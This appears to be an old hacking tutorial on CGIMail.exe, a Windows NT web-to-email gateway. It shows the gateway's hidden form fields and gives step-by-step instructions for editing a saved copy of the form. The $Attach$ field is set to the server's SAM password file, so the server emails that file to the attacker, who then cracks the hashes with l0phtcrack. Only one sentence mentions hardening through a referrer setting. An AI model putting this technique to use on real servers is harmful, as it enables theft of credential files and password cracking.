CGIMail.exe is a Web to e-mail gateway program written by Stalkerlabs for a Win32 platform, that is Windows NT or Windows 95. Basically, you fill in an on-line form and it is e-mailed off. The contents of the form contains the following :

<form action="/scripts/CGImail.exe" method="POST" NAME="TestForm">

<input type=hidden name="$File$" value="/scripts/template.txt">

<input type=hidden name="$Subject$" value="CGImail Example">

<input type=hidden name="$LocationOK$" value="/ok.html">

<input type=hidden name="$LocationKO$" value="/ko.html">

<input type=hidden name="$To$" value="mnemonix@globalnet.co.uk">

<input type=hidden name="$Optional$" value="mmmh, no!">

There is also another "hidden" input type and this takes the following shape:

<input type=hidden name="$Attach$" value="">

This allows you to attach a file to the e-mail….any file the IUSR_COMPUTERNAME account has access to. So if the NT server is poorly configured as far as security is concerned you could put in "c:\winnt\repair\sam._" as the input’s value:

<input type=hidden name="$Attach$" value="c:\winnt\repair\sam._">

Note – Using %windir% won’t work – you need the full path.

So here’s how the hack would go :

You go to their form page and view the source. Save this source to the desktop and make some editions to it, like put your e-mail address in (use a temporary one!) and put the $Attach$ entry in. Save these changes and then load the new page and click o n send.

All things going well you should receive a compressed copy of their SAM which you can then get to work on, using l0phtcrack to glean the passwords.

CGIMail can be made more secure: the cgimail.ini can be edited so that only certain referrers are accepted but only around 50% of the machines I’ve seen with this on have configured it so.

You can find out more (no-hacking) info about this program from the vendor’s site:

http://www.stalkerlab.ch/SMailers/index.html